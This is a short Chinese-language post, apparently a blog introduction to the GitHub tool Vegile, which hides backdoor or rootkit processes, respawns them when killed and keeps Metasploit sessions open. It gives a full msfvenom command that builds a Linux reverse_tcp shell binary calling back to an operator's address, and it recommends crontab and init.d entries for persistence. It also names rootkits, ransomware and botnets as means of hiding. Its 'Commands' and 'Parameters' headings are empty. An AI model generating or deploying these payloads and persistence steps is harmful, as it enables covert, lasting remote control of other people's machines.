GitHub开源的项目Vegile

原理

这个工具将会设置你的后门/rootkit,它将隐藏你的spesisifc进程,在metasploit中无限制地产生会话,并且这一过程是透明的。后门即使被杀,也会重新运行。在运行另一个进程时总会有一个过程在待命,所以我们可以认为这个过程是不可改变的,就像“shell中的鬼”

  • 现在我将使用msf命令中的reverse_shell来测试后门,我的后门针对的是linux,你也可以使用thefatrat创建一个简单的后门。
  • msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAME_BACKDOOR
  • 对于隐藏你可以使用rootkits,backdoor,ransom and botnet(脚本,python,perl,exe或者binary)
  • 为了获得持久性,你可以使用crontab和xinit.d进入你的后门

命令

先拉取项目

参数